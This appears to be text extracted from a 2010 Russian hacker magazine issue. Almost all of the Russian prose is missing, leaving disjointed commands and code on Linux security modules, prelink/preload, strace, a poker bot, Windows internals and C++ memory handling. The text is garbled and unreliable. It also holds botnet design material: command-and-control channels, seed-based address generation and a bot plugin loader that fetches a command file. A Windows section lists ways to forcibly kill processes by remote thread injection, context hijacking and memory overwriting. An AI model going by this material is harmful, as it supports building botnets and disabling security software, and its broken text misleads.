SELINUX=enforcing|permissive|disabled

SELinux
, : dhcpd, httpd, named, nscd, ntpd,
portmap, snmpd, squid syslogd. unconfined_t. ,
SELINUXTYPE strict:
SELINUXTYPE=targeted|strict

newrole. SELinux .
, :
# ls -l context /
# ps -ax -Z

, /proc:

090

/etc/selinux/targeted/contexts .
, root :
# cat /etc/selinux/targeted/contexts/users/root
system_r:unconfined_t:s0 system_r:unconfined_t:s0
system_r:initrc_t:s0 system_r:unconfined_t:s0
X 08 /139/ 10

SELinux : setools policycoreutils, policycoreutils-newrole. ,


, , . , newrole,
,
policycoreutils.
targened,
selinux-policy*.
selinux-policy-devel.
200 , ,
.
audit2allow ( policycoreutils),
SELinux.

APPARMOR

AppArmor

Skype
,
Skype. (. Skype: , www.xakep.ru/post/38543/default.
asp). .
, ,
, . , , : www.cynapses.org/tmp/apparmor/
usr.bin.skype.
apparmor-profiles.
.
aa-genprof ( genprof). :
$ sudo aa-genprof /usr/bin/skype

: , , , .
/etc/apparmor.d/usr.bin.skype.
AppArmor enforce-:
$ sudo aa-enforce skype

AppArmor .

, httpd,
:
# grep -iR httpd /etc/selinux/targeted/contexts

, .
SELinux: getsebool -a.
setsebool ( '-P'
) system-configsecuritylevel.
sestatus -v .
:
# dmesg | grep -i selinux
SELinux: Initializing.
SELinux: Starting in permissive mode
# grep -iR selinux /var/log/messages
X 08 /139/ 10

Application Armor Immunix Inc.


, Novell ,
GNU GPL,
openSUSE. AppArmor .
Immunix Novell,
. openSUSE AppArmor
, SELinux.
- AppArmor is dead,
,
,
.
Canonical, AppArmor. ,
, .
, ,
initramfs. Ubuntu AppArmor
LSM (Linux Security Modules), security_path
vfs.
AppArmor ,
. SELinux, AppArmor
.
(profiles),
,
. . :
SELinux , AppArmor , . ,
, ,
. . ,
SELinux
, AppArmor .

, AppArmor
, . ,
aa-genprof aa-logprof, . AppArmor init-, , securityfs.
$ sudo /etc/init.d/apparmor start

,
/sys/kernel/security/apparmor/profiles ( /etc/init.d/
apparmor status); Server/
Desktop .
( ) /etc/
apparmor.d ,
. .
. AppArmor
enforce-. , .

091

UNIXOID

TOMOYO Linux
complain,
. , SELinux,
, AppArmor
.
:
flags=(complain);
complain _ ( enforce);
echo 1 > /sys/kernel/security/apparmor/
control/complain.
, , ,
. , AppArmor , .

(apt-cache search apparmor), , -
apparmor.opensuse.org.
, 2.4/2.6 Trustees (trustees.
sf.net), ACL a- Novell Netware,

. ,
, SELinux AppArmor.

TOMOYO LINUX
TOMOYO Linux (tomoyo.sf.jp) 2003 NTT DATA CORPORATION MAC Linu. GNU GPL
SF.net.
. 2.6.30,
TOMOYO Linux ,
.
TOMOYO Linux. ,

TOMOYO Linux

2.4 2.6. ( )
LSM, 1.: , ,
POSIX- ( ).

,
Mandriva. ,
Tomoyo GUI,
.

. , Ubuntu 10.04:
$ sudo echo 'deb http://osdn.dl.sourceforge.jp/
tomoyo/47128/ ./' >> /etc/apt/sources.list
$ sudo apt-get update
$ sudo apt-get install linux-ccs ccs-tools

, Enable
different security models TOMOYO Linux Support Security
options.
TOMOYO AppArmor. (pathname based), .
. , TOMOYO
, . , , SSH, ,
. , , (UID/GUD).
TOMOYO (domains).
TOMOYO /etc/tomoyo,
/proc/tomoyo,
. TOMOYO /etc/tomoyo/profile.conf /proc/tomoyo/profile.
TOMOYO disable, permissive,
enforsing learning (, ).
:
manager.conf (/proc/tomoyo/manager) ,
/proc/tomoyo;
exception_policy.conf (/proc/tomoyo/exception_policy)
;
domain_policy.conf (/proc/tomoyo/domain_policy) ;
meminfo.conf (/proc/tomoyo/meminfo)
.
ccs-tools
TOMOYO, /usr/lib/ccs/tomoyo_init_police.sh,
. .
:
# /usr/lib/ccs/editpolicy /etc/tomoyo/

TOMOYO
SELinux AppArmor.z

092

X 08 /139/ 10

UNIXOID
zobni n@gmail.com

Linux

Linux .
, ,
, 500 ,
,
. ,
, ,
? .
(,
GTK+ 2.X, X Free 4.X
Linux 2.6)
.
,
.
-

094

, .

PRELINK
- ,

. ?



. a.out,
.
a.out , ,
X 08 /139/ 10

WARNING
warning


update-initramfs

prelink
Ubuntu
.

,
DT_GNU_HASH


(glibc).

Readahead bootchart
, .. ,
, ,
(,
?). ,
ELF (
:)),


.
, (,
, ..)
.
ELF UNIX/Linux
, ,
, .
.
,
, ,
,

50 ,
( ).
- ELF- a.out.
,
, ,

.
-
Red Hat Jakub Jelinek 2004
. , , 50%
,
(OpenOffice, KDE, Gnome) .

.
, - . Jakub Jelinek
prelink.
Linux-,
.
prelink, ,
:
# prelink -avmR
X 08 /139/ 10

:
v ;
a -
;
m (,
);
R (
).


.
:
1. Prelink , '-fPIC'. ,
, ;
2. Prelink wine,
Windows- ;
3.
prelink;
4. .
prelink :
# prelink -au

PRELOAD
prelink preload,
. ,
preload
.

,
.
preload , ,

. , preload

INFO

info

prelink
Mac OS X.

prebinding.
preload
Windows
Prefetcher
( SuperFetch) ,
Windows XP.

init,
Ubuntu


upstart,

15-20
.
cryopid.berlios.de

CryoPID.
people.redhat.com/
jakub/prelink.pdf
Prelink
.
behdad.org/preload.
pdf Preload .
www.checkpointing.
org
.
dmtcp.sourceforge.net

095

UNIXOID

, .
preload ,

:
$ sudo apt-get install preload

/etc/preload.
conf. ,
-,
, , preload .
model:
cycle .
20 .
, , preload , .
halflife , preload
50%.
168 (). ,
, , /
.
minsize (, ), preload. 2 000 000
( 2 ), preload .
, ,
.
memtotal, memfree, memcached
preload . : ( memtotal) +
(, memfree) + ( memcached).
system :
mapprefix , ( , , ).
exeprefix .
sortstrategy -.
3 ( ).
1, 2.
, preload:
$ sudo /etc/init.d/preload reload

, preload ,
/val/log/preload.log.
preload /var/lib/preload/preload.state.

READAHEAD
Ubuntu, Linux,
readahead .
preload, readahead
.
, readahead
Linux .
/sbin/readahead-list,
/etc/readahead/boot /etc/readahead/desktop . , , , .
, Ubuntu
. . profile .

096


Preload
, <Esc>
, <e>
profile. <b> . , .

CRYOPID
.
, jabber- .
, .
,
,
,
? , . CryoPID
.
root , x86
amd64 , ,
. -
,
. CryoPID
, :
$ cd /tmp
$ wget http://dagobah.ucc.asn.au/wacky/cryopid-0.5.9.1i386.tar.gz
$ tar -xzf cryopid-0.5.9.1-i386.tar.gz
$ cd cryopid-0.5.9.1/src
$ make
$ mkdir ~/bin
$ cp freeze ~/bin

:
$ ~/bin/freeze - pid-

, CryoPID ,
X-,
.

UBUNTU
Ubuntu , . BSD-. ,
.
X 08 /139/ 10

OpenOffice.org

Ubuntu
1. grub. 3 ,
.
/boot/grub/menu.lst, timeout=3 3 0.
2. splash. Ubuntu splash-screen,
, .
/boot/grub/menu.lst
quiet splash .
3. IPv6. IPv6
Linux ,
/etc/
modprobe.d/aliases. IPv6 ,
ipv6.disable=1. , /boot/grub/menu.lst.
4. .
,
(suspend) . , ,
noresume . , .
5. initramfs. RAM- ,
.
,
. ,
.
/etc/initramfs-tools/initramfs.conf, MODULES=most
MODULES=dep.
:
$ sudo update-initramfs -k all -u

.
6. . Ubuntu
.
, . System Administration
Services .
, :
Bluetooth Manager Bluetooth
Check for new hardware drivers

X 08 /139/ 10

Evolution Alarm Notifier


Evolution
Print Queue Applet
Tracker

7. .
( ). ,
System Preferences Applications startup
, (,
bluetooth).
:
, :
sh -c "sleep 10; exec bluetooth-applet"
sh -c "sleep 20; exec /usr/lib/evolution/2.28/
evolution-alarm-notify"


10. DE .


, ,
.
, . .
OpenOffice.org.
,
. Tools Options,
Memory. Number of
steps 20, .
Graphics cache Use for OpenOffice.
org 128, Memory per object 20. Java
Use a Java runtime environment.
.
Firefox.
. ,
,
.
. , . sqlite,
:
$ find ~/.mozilla/firefox/ -name *.sqlite \
-exec sqlite3 {} VACUUM \;

(, ),
.z

097

UNIXOID
Adept adeptg@gmail.com


strace
: ,
.
. ! ,
, .
, ,
,
-.


strace. ,
#10 2009 ( ), , strace
-

098

, ,
. Strace
:

- ;
-

- ;
strace
, tcpdump,
;
( /dev/random /dev/
X 08 /139/ 10

WARNING
warning


Firefox 1

strace Firefox
audit) strace ;
,
. , , AppArmor
chroot.
strace :
$ strace uname
execve("/bin/uname", ["uname"], [/* 36 vars
*/]) = 0
brk(0) = 0x1ed2000
access("/etc/ld.so.nohwcap", F_OK) = -1
ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x7fb79f08a000
access("/etc/ld.so.preload", R_OK) = -1
ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_
size=133660, ...}) = 0

### , /usr/
lib/locale/ru_RU.utf8
uname({sys="Linux", node="adept-laptop",
...}) = 0

strace stderr,
. strace
'-o':

access:
.
(
F_OK).
-1 () ENOENT
(No such file or directory). ,

.
, access
, -
.
open,
(O_RDONLY, O_WRONLY O_RDWR).

, ( ,
close).
open
read write.
,
/ .
fstat
( inode, uid, gid ..)
uname, .
uname ,
.
. . , open access (

):
$ strace -e trace=open,access \
-o strace.log uname


, : file, process, network, signal
ipc. , .
, mmap:
$ strace -e trace=\!mmap -o strace.log uname

$ strace -o uname.strace uname

execve: .
( ) , . strace
,
'-v'. 0 ok.
-1.
X 08 /139/ 10

,
.
.
strace ,
'-f'.
strace ,
'-ff', strace
filename.PID.



ldd



. ,
, :
www.catonmat.net/
blog/ldd-arbitrarycode-execution/.


readelf.

HTTP://WWW
links
strace.sourceforge.
net
www.ltrace.org
github.com/rvoicilas/
inotify-tools

INFO

info



.
Linux
2.6 400
.




man. ,

open
: man
2 open.
strace


ptrace.

ltrace.

099

UNIXOID

Inotify:

strace ,
.
. inotify. Inotify ,
.
2.6.13 ( 2005). Inotify , , ( Beagle),
, incron.
Incron cron , , .
(incron ) /etc/incron.allow,
,
incron.
:
$ incrontab -e

:
<> <> <> (
)

IN_ACCESS
IN_ATTRIB /
IN_MODIFY
IN_CREATE
IN_DELETE
IN_DELETE_SELF

IN_MOVE
IN_ALL_EVENTS

. :
$@ /
$# ,
( )
$%

strace:
'-p' PID
. , '-p' .
apache:
# strace -f $(pidof apache2 | sed 's/\([0-9]*\)/\-p
\1/g')

strace,
,
.


-, 1.3, PHP 4,
.

100

OpenOffice
PHP mail . ,
. apache,
PHP sendmail , ,


Strace ( system trace) , BSD- . 1991
SunOS trace. Linux
, . 1992 2.5 SunOS, Linux
1.5. 1993 strace 2.5 SunOS strace Linux,
truss SVR4.
strace, Linux, SunOS. 1994
strace SVR4 Solaris, 1995 Irix. strace ,
.
4.5.20 14 2010 . strace ,
.

, strace
DTrace Sun Microsystems, Solaris, FreeBSD
Mac OS X (10.5 ). Linux.
ktrace FreeBSD, OpenBSD, NetBSD Mac OS X (
10.5).

Inotify-tools
Incron , inotify
inotify-tools, inotifywait inotifywatch,
. Inotifywait

.
man', inotifywait:
$ cat ~/script.sh
while inotifywait -e modify \
/var/log/apache2/error.log; do
tail -1 /var/log/apache2/error.log | \
notify-send "Apache needs love!"
done

Inotifywatch /
.
,
.
X 08 /139/ 10

ldd Firefox

. strace. :

, Firefox

# strace -f -o /tmp/apache2.strace \
/etc/init.d/apache2 start

, ( mail.
php) , apache ,
.
$ grep mail.php /tmp/apache2.strace
5345 read(9, "GET /mail.php HTTP/1.1\r\nHost:
12"..., 8000) = 397
5345 stat("/var/www/mail.php", {st_mode=S_
IFREG|0644, st_size=256, ...}) = 0
5345 lstat("/var/www/mail.php", {st_mode=S_
IFREG|0644, st_size=256, ...}) = 0
5345 open("/var/www/mail.php", O_RDONLY) = 10

PID, , , .
,
. , grep mail.php , PID- (5345), . ,
grep PID:
$ grep 5345 /tmp/apache2.strace
5340 clone(child_stack=0, flags=CLONE_CHILD_
CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_
tidptr=0x7f3bf2eada10) = 5345

5345 read(9, "GET /mail.php HTTP/1.1\r\nHost:


12"..., 8000) = 397
5345 stat("/var/www/mail.php", {st_mode=S_
IFREG|0644, st_size=256, ...}) = 0

5345 clone(child_stack=0, flags=CLONE_CHILD_


CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_
tidptr=0x7f3bf2eada10) = 5347

.
clone
PID 5347. , ! :) Grep 5347:
X 08 /139/ 10

$ grep 5347 /tmp/apache2.strace


5345 clone(child_stack=0, flags=CLONE_CHILD_
CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_
tidptr=0x7f3bf2eada10) = 5347

5347 execve("/bin/sh", ["sh", "-c", "/usr/sbin/


sendmail -t -i "], [/* 6 vars */] = -1 EACCES
(Permission denied)

! /usr/sbin/sendmail,
. sendmail
, /bin/sh . -
, /bin/sh 770 (
root), www-data ( apache)
.
.


strace ,
tcpdump. , strace ,
.
IP , , ,
dig IP, firefox
. :
$ strace -f -e trace=network firefox xakep.ru
7879 socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_
NONBLOCK, 0) = 3
7879 connect(3, {sa_family=AF_FILE, path="/var/run/
nscd/socket"}, 110) = 0
7879 sendto(3, "\2\0\0\0\v\0\0\0\7\0\0\0passwd\0",
19, MSG_NOSIGNAL, NULL, 0) = 19

connect , Firefox NSCD ( ) ,


, NSCD DNS.

101

UNIXOID

# ldd /usr/local/nginx/sbin/nginx
linux-gate.so.1 => (0xb7789000)
libcrypt.so.1 => /lib/i686/cmov/libcrypt.so.1
(0xb7751000)
libpcre.so.3 => /usr/lib/libpcre.so.3 (0xb7728000)
libssl.so.0.9.8 => /usr/lib/i686/cmov/libssl.
so.0.9.8 (0xb75d4000)
libcrypto.so.0.9.8 => /usr/lib/i686/cmov/libcrypto.
so.0.9.8 (0xb7cde000)
libz.so.1 => /usr/lib/libz.so.1 (0xb75bf000)
libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7464000)
libdl.so.2 => /lib/i686/cmov/libdl.so.2 (0xb7460000)
/lib/ld-linux.so.2 (0xb778a000)

chroot-
(, /chroot/nginx). , ,
, ldd
.
nginx' .
:

Firefox

NSCD , , .


, - ,
kill. , , , . :
Debian Etch, squid NCSA SAMS . SAMS squid
.
# strace -f -o /tmp/samsdaemon /etc/init.d/samsd start

15773 13:16:03 stat64("/etc/squid/ncsa.sams", {st_


mode=S_IFREG|0644, st_size=314, ...}) = 0
15773 13:16:03 open("/etc/squid/ncsa.sams", O_
RDONLY|O_APPEND|O_LARGEFILE) = 3
15773 13:16:03 close(3) = 0
15773 13:16:03 open("/dev/random", O_RDONLY) = 3
15773 13:16:03 read(3,

, .
, /dev/random. SAMS
. /dev/urandom, , /dev/random.

NGINX
,
.

chroot.
, strace
ldd ( ELF). , chroot
- nginx.
, nginx (
0.8.40)
/usr/local. , :

102

# strace -e trace=open /usr/local/nginx/sbin/nginx


open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/i686/cmov/libcrypt.so.1", O_RDONLY) = 3
open("/usr/lib/libpcre.so.3", O_RDONLY) = 3
open("/usr/lib/i686/cmov/libssl.so.0.9.8", O_RDONLY)
= 3
open("/usr/lib/i686/cmov/libcrypto.so.0.9.8",
O_RDONLY) = 3

open("/etc/passwd", O_RDONLY|O_CLOEXEC) = 4
open("/etc/group", O_RDONLY|O_CLOEXEC) = 4
open("/usr/local/nginx/logs/access.log", O_WRONLY|O_
CREAT|O_APPEND|O_LARGEFILE, 0644) = 4
open("/usr/local/nginx/logs/error.log", O_WRONLY|O_
CREAT|O_APPEND|O_LARGEFILE, 0644) = 5

,
(, /etc/
passwd).
chroot- /dev/null, nginx':
# mknod /chroot/nginx/dev/null c 1 3

. nginx chroot :
# chroot /chroot/nginx/ /usr/local/nginx/sbin/nginx

strace . -,
,
( apache production ) .
32-
64- . , ,
,
( , , ).
, strace ,
.
, , gdb.z
X 08 /139/ 10

CODING
c0n Difesa condifesa@gmail.com, http://defec.ru


-
. -

.

DDoS-,
.

? , -
, TAN (Transaction authentication number,
-), .
-.
,
, .
- ,
. -
.
, .
.
. , ,
-. . , , .


. -.
:
- -.
(,
Zeus).
Instant Message
IM- (ICQ, jabber, MSN ..). -
.

104

IRC IRC-.
.
-
() .
Twitter-
-. ,
-, API. , ,
- ,

.
TCP/IP-based ,
TCP/IP. ,
.

( ):
(
);
P2P ( ).

, .

. , , /
,
.
-
:
(
,
);
X 08 /139/ 10

>> coding

Bot
Master

Bot
Bot


(
, ).


-. , , - , :
1) Peer-to-peer .
, ( )
IP ,
;
2)
,
;
3)
(P2P) , , ;
4) ( /
).

P2P- . ,
.
,
,
, ,
- .
.

,
-
, ,
.
, :

int generator (int seed) {


srand(seed);
/*
*/
for (x = 1; x <= 20; x++)
printf("iteration %d, rand=%d\n", x, rand());
getch();
return 0;
}
X 08 /139/ 10

DDoS

,
,
srand() rand(). seed srand()
, , ,
rand().
generator() seed=123:
440
19053
23075

, seed , .

,
.

. ,
.
: , , , .
,

. , -
( seed),

.

.
.
(
).

.NET



. , ,

105

CODING

Master

Bot


.
, ,
.
][ ONLINE -
ASP.NET. ,
-
. -,
, ( ) ().
- .

:
, ;
,
.

- Config.Web :
<configuration>
<security>
<authentication mode="Cookie"/>
</security>
</configuration>


Cookies-. (UserLogin UserPassword), , , cookies-, ,
:
<script language="C#" runat= server>
void Login_Click(Object sender, EventArgs E) {
if ((UserLogin.Value == "DotSiteTeam")
&& (UserPassword.Value == "BestITResource")) {
CookieAuthentication.RedirectFromLoginPage(
UserLogin.Value,true);
}
else {
//
}
}
</script>

ASP.NET , ,
URL,
: URL File.
, -

106

Bot

Bot
Bot
Bot

Bot

.
, URL
, , :
<authorization>
<allow users="*" />
<deny users="?" />
</authorization>

, , ,
- ASP.NET, ,
.


. ? , , -
,
. . ,
:
1. ;
2. ,
;
3. ;
4. .

(command.txt).
HTTPDownload(char *FileUrl, char *FileName). .dll .
, ,
, Windows: wininet.dll.
DLL API
, FTP, HTTP Gopher. API,
, WinSock TCP/IP, -.
X 08 /139/ 10

>> coding

INFO

info


,
.
,
:
, ,
. :

<(1)> [(1)] [(2)]
[(i)]
<(2)> [(1)] [(2)]
[(j)]

<(k)> [(1)] [(2)]


[(n)]

i, j, k (1; ).
:
1. k- ;
2. , , ( PlugLibrary());
3. PlugLibrary() , .
command.txt Parse(char
*FileName).
dll
, PlugLibrary

(
dll):
//
hPlugin = LoadLibrary(DllName);
// (DefType)
typedef int (*DefType)(char *);
/* Load,
*/
DefType Load = (DefType)
X 08 /139/ 10

GetProcAddress(hPlugin,"Load");
/* "Load"
*/
int iCode=(*Load)(Parametrs);

Load, ,
,
-.

.
:
-,
,

, ,

. , :
,
, .
, ,
. z

Web 2.0


.

.

DVD
dvd




MS Visual Studio 2010.

HTTP://WWW
links
http://www.xakep.
ru/magazine/
xa/128/056/1.asp

:
.
http://msdn.
microsoft.com/ru-ru/
library/dd335939.
aspx

web ASP.
NET
http://defec.ru
,

,

.

107

CODING
Tim timreset@mail.ru, javatalks.ru

.
,
Holdem No Limit Poker
PokerStars.

. .

Ilogic IEventSimulation. , .
,
,
ILogic
.
int getAnswer(float p, float totalBet, float curBet,
float pot, int betting, int minRaise), 0,
(fold), 1 (call) 2
(raise).
,
.
: p (
poker room ]
[ ), totalBet
, curBet ,
, pot , betting ,
minRaise , . .

. IEventSimulation , .
:

108

changeBoardCard(int[] board)
, changePot(int pot)
, changeMoneyOfPlayers(int[]
money) , postDillerMessage(String message)
, changeDillerPosition(int
posOfDealer) ,
changePlayerStatus(int player, int status, int[] hand)
.

,
. , . ,
PokerStars
,
, . Holdem Poker PokerStars.
NoLimit Limit, -
.
: AggressiveLogic ( ),
CautiousLogic ( ), RationalLogic ( ), RaiseLogic ( ), CallLogic
( ), FoldLogic ( ),
RandomLogic ( ).
AggressiveLogic, CautiousLogic RationalLogic
X 08 /139/ 10

>> coding

HoldemConsole

HoldemForm

p*pot = win win .


, , (

). , CautiousLogic ,
, AggressiveLogic ,
. HoldemForm swinge
IEventSimulation ILogic.
, , , ..
,
Fold, Call Raise.
,
, .
HoldemConsole .

, ,
(playersList). ,
: trade(int betting) ,
startGame() , , int
getSinglePlayer() ,
, int getActivePlayer()
. set setBigBlind(int
bigBlind), setRoundCount(int roundCount).
, ,
, , ,
, , .
,
, ,
. .

. :
1) ;
2) ( );
3) ;
4) ();
5) ;
6) ();
7) ;
8) ();
9) ;
10) .
, ,
. , .
, , .
, .

.

, . -, :
(moneyOfPlayers), (handOfPlayers) (
) stateOfPlayers. -,
(posOfDealer), (pot), (bigBlind) (board).
,
(totalBet). X 08 /139/ 10

STARTGAME

,
:
,
, . :
, (
), .
,
.
,

. , , ,

, .
:
x = (x + 1) % 9;

x 0 8-9.
.

TRADE

109

CODING

== maxBet)) {
continue;
}
if (moneyOfPlayers[curPlayer] == 0) {
continue;
}


. 1 (-), 2 (), 3 (), 4
(). ,
,
. .
-


public int getAction(float p, float totalBet, float
curBet, float pot, int betting, int minRaise) {
if (curBet == 0) {
btnCall.setText("Check");
} else {
btnCall.setText("Call " +
String.valueOf(curBet));
}
btnCall.setVisible(true);
btnFold.setVisible(true);
btnRiase.setVisible(true);
btnRiase.setText("Raise " +
String.valueOf(curBet + minRaise));
frame.repaint();
action = -1;
while (action == -1) {
try {
Thread.sleep(500);
} catch (InterruptedException e) {
e.printStackTrace();
}
frame.repaint();
}
btnCall.setVisible(false);
btnFold.setVisible(false);
btnRiase.setVisible(false);
frame.repaint();
return action;
}

: ,
. , (
),
.

//
curPlayer = (curPlayer + 1) % 9;
if (getSinglePlayer() != -1) {
break;
}
if (stateOfPlayers[curPlayer] == false) {
continue;
}
if ((repeatTrade == true) && (betOfPlayers[curPlayer]

110

. ,
ILogic :

float p=logic.getProbabilityOfWin(
handOfPlayers[curPlayer], board,getActivePlayers());
int action=playersList.get(curPlayer).getAction(p,
totalBet[curPlayer] + betOfPlayers[curPlayer],
maxBet-betOfPlayers[curPlayer],pot,betting,
maxBet==0?bigBlind:maxBet);

:
, (,
) .
getAction ;
;
, ,
,
;
; , ,
. ,
, .
( action) .
: fold, ;
call, , ,
all-in, ,
, , ; raise,
,
, .
,
, , (all-in). ,
. -
, ,
.

.
:
HoldemForm
List<ILogic> playersList=new ArrayList<ILogic>();
playersList.add(frame);
playersList.add(new FoldLogic());
playersList.add(new CautiousLogic());
playersList.add(new CallLogic());
playersList.add(new RationalLogic());
playersList.add(new AggressiveLogic());
playersList.add(new CautiousLogic());
playersList.add(new AggressiveLogic());
playersList.add(new RaiseLogic());

,
,
X 08 /139/ 10

>> coding

playersList.add(new RandomLogic());
playersList.add(new AggressiveLogic());
playersList.add(new RaiseLogic());


:
http://www.pokerbonus.org.ua/menu/pravila.html
http://www.tehasskiy-holdem.info/
http://www.pokerstars.com/ru/poker/games/
texas-holdem/
:
http://poker-wiki.ru/poker/_
_
:
http://poker-wiki.ru/

50 15 .
, .
49 ( $750):
1-
2-
3-
4-
5-
6-
7-
8-
9-

$580
$590
$570
$2220
$570
$680
$0
$750
$790

INFO

info

,


HoldemForm,


.

:
. , , , fold, call raise.
,
, ,
. ,
. - ,
,
timreset@mail.ru
,
, :
1) .
.
2) HoldemForm ,
changeDillerPosition . -
.
3) .
.
4) .
float . Int -
, , .
5)
.
. .
6) .
.
7) ,
, .
, . (-
,
, ),
. ,
, HoldemConsole.
:
HoldemConsole
playersList.add(new
playersList.add(new
playersList.add(new
playersList.add(new
playersList.add(new
playersList.add(new
X 08 /139/ 10

RationalLogic());
FoldLogic());
CautiousLogic());
CallLogic());
CautiousLogic());
AggressiveLogic());

1-
2-
3-
4-
5-
6-
7-
8-
9-

$570
$560
$580
$2450
$590
$1110
$0
$890
$0

.
,
CallLogic, RaiseLogic (
) AggressiveLogic ( ).
?
RationalLogic , , ? , ,
, ,
.
,
( )
. ,
, .
, , ,
, .
CallLogic, RaiseLogic AggressiveLogic.
,
. , .
SB minRaise,
minRaise ,
.
, . , , ,


:)
. ,

-
. z

DVD
dvd

.

JavaDoc

,
.

.

HTTP://WWW
links


http://poker-wiki.ru

111

CODING
aleksandr-ehkkert@rambler.ru

WINDOWS

,
. , ,
, .
.

,
.
, , - . Windows,
:). ,
Windows. , ,
,
.

,
, ,
.
, .
,
,
. ,
, ,
Windows . , .

LPRESERVED DLLMAIN
DllMain:
BOOL WINAPI DllMain(
__in HINSTANCE hinstDLL,

112

__in
__in
);

DWORD dwReason,
LPVOID lpReserved

( ) .
, ? ,
lpReserved,
? , Microsoft.
MSDN , / ; ,
. , , lpReserved .
: lpReserved , , !
:
APC AsyncProcedureCall,
LdrInitializeThunk, Ntdll.dll.
, LdrInitializeThunk,
CONTEXT, , .. APC,
LdrInitializeThunk. ntdll!LdrInitializeThunk,
, CreateThread.
X 08 /139/ 10

>> coding

ntdll.dll kernel32.dll explorer.exe firefox.exe


( !),
CreateThread APC
LdrInitializeThunk .
: , dwReason DLL_
PROCESS_ATTACH ( ), lpReserved
NULL non-NULL
.
, fdwReason DLL_PROCESS_DETACH
( ), lpReserved NUL
FreeLibrary DLL, nonNULL .
Microsoft ? ,
:). ,
! ? ?
SetThreadContext ? ,
. -, CONTEXT
.
CONTEXT ( ).
DEBUG- .
, , TF EFLAGS
-, lpReserved->Eip .
,

.
, .

DLL

, ,
ntdll.dll, kernel32.dll user32.dll
, Microsoft . ?
,

. , ntdll.dll
. .

. ,
ntdll!LdrInitializeThunk. ntdll!KiUserApcDispatcher
X 08 /139/ 10

,
.

. ,

( ), ntdll.dll . Kernel32.dll
,


. , kernel32.dll
( Ctrl+C ,
?). , Ctrl+C
. user32.dll ,
, win32k.sys
, Windows.
win32k.sys
NtUserInitializeClientPfnArrays .

DVD
dvd
DVD

WinDBG,
Windows,
-
,

.

? - !


? , ,
. .
( ) Win32-
,
. , CSRSS

Ctrl+C/Ctrl+Break.
-, Win32-API-
.
, WSAAsyncGetHostByName
gethostbyname ,

.

X86 WOW64

HTTP://WWW
links
Windows

.



,
www.alex-ionescu.
com http://j00ru.
vexillium.org.

Wow64 32- dll, Win32 API-

113

CODING

32- EXE-DLL

32- Ntdll. dll

, ,
32-
Wow64,
GetThreadContext/SetThreadContext, .

Wow64. , THREAD_QUERY_
INFORMATION.

12

Wow64c pu.dll

Wow64.dll

Wow64win.dll

64- Ntdll. dll

Ntoskrnl.exe

wow64

( Wow64-).
32- dll Wow64-?
64- Windows dll 32- 32- . , Wow64-
ws2_32.dll Vista x64 , 32- ws2_32.
dll Vista x86. , dll , , ntdll.dll.
x86 ntdll.dll,
,
SystemCallStub SharedUserData:
lkd> u ntdll!NtClose
ntdll!ZwClose:
mov
eax,30h
mov
edx,offset SharedUserData!SystemCallStub
call dword ptr [edx]
ret
4

Wow64- ntdll . 0xc0 32-


TEB (Thread Environment Block):
lkd> u ntdll!NtClose
ntdll!ZwClose:
mov
eax,0Ch
xor
ecx,ecx
lea
edx,[esp+4]
call dword ptr fs:[0C0h]
ret
4

, TEB 0xc0
, WOW32Reserved:
lkd> dt ntdll!_TEB
+0x000 NtTib
[skip...]
+0x0c0 WOW32Reserved

114

: _NT_TIB
: Ptr32 Void

, ,
12 :
1) TerminateProcess NtTerminateProcess
, , ;
2) CreateRemoteThread ExitProcess.
ExitProcess , ;
3) NtQuerySystemInformation toolhelp32
TerminateThread or NtTerminateThread. TerminateThread (NtTerminateThread);
4) NtQuerySystemInformation toolhelp32, SetThreadContext EIP ,
ExitProcess;
5) 0 4096 DuplicateHandle TargetProcess TargetProcessHandle NULL, Options
0x1. ,
.
, , notepad.exe;
6)
CreateJobObject, AssignProcessToJobObject TerminateJobObject;
7) , NtCreateDebugObject ,
NtDebugActiveProcess, -
( ) CloseHandle;
8)
VirtualQueryEx PAGE_NOACCESS
VirtualProtectEx. ,
;
9) VirtualQueryEx,
WriteProcessMemory
;
10)
VirtualQueryEx. ,
;
11) PsTerminateProcess (PspTerminateProcess).
, ;
12)
PspTerminateThreadByPointer. ,
.
, ,
PspTerminateThreadByPointer
, .

, , . .
,
, Windows
.
. ! ,
! z
X 08 /139/ 10

CODING
deeonis deeonis@gmail.com

C++

++ , ,
. ? :).
NEW DELETE, ,

,
.
, C++ ,
, ,
.
. , , (, Java C#),

,

.
, , , ,
C++. ,
. ,
. ,
, , .

.


new delete?

,
. new delete
, .
, , . ,
. ,
delete. , delete
. .
,
X 08 /139/ 10

.
.
,
, ? , . new
. delete
, , .
, - , .
new delete, ,
.
, ,
, .
,
, ,
.
, ,
.
, new delete

, .

, . , , new delete
,
, ;
( ), ..
new delete
. -

115

CODING
CODING
PREDIDENTUA / HTTP://TUTAMC.COM/

, C++

, :
, ,
,

, - .

.

new

new delete . , ,
new . ,
, .
new
static const int signature = 0xADADEAEA;
typedef unsigned char Byte;
void *operator new(std::size_t size)
throw(std::bad_alloc)
{
using namespace std;
size_t realSize = size + 2 * sizeof(int);
void *pMem = malloc(realSize);
if (!pMem)
throw(bad_alloc);
*(static_cast<int>pMem)) = signature;
*(reinterpret_cast<int*>(static_cast<Byte*>(pMem)
+ realSize sizeof(int))) = signature;
return static_cast<Byte*>(pMem) + sizeof(int);
}

malloc
, ,
, .
, , . , .
, ,
, , double
. , .
C++ , , new,

116

++
. malloc
, , ,
, , ,
, , .
double , int
, new, ,
,
.
, , .
new, - new.

- new

new , .
new
.
new,
.

, new - (newhandler), . ,
set_new_handler,
<new> :
set_new_handler
namespace std {
typedef void (*new_handler) ();
X 08 /139/ 10

.
abort exit, , ,
. new,
.
,
set_new_handler new. set_new_handler new ,
operator new ,
new ,
.


new_handler set_new_handler(new_handler p)
throw();
}

, new_handler typedef ,
, set_new_handler
, new_handler. new
.
(set_new_handler). :
set_new_handler
void outOfMem()
{
std::cerr << " \n";
std::abort();
}
int main()
{
std::set_new_handler(outOfMem);
int *pBigDataArray = new int[100000000L];
...
}

new ,
. - ,

. .
. new-handler
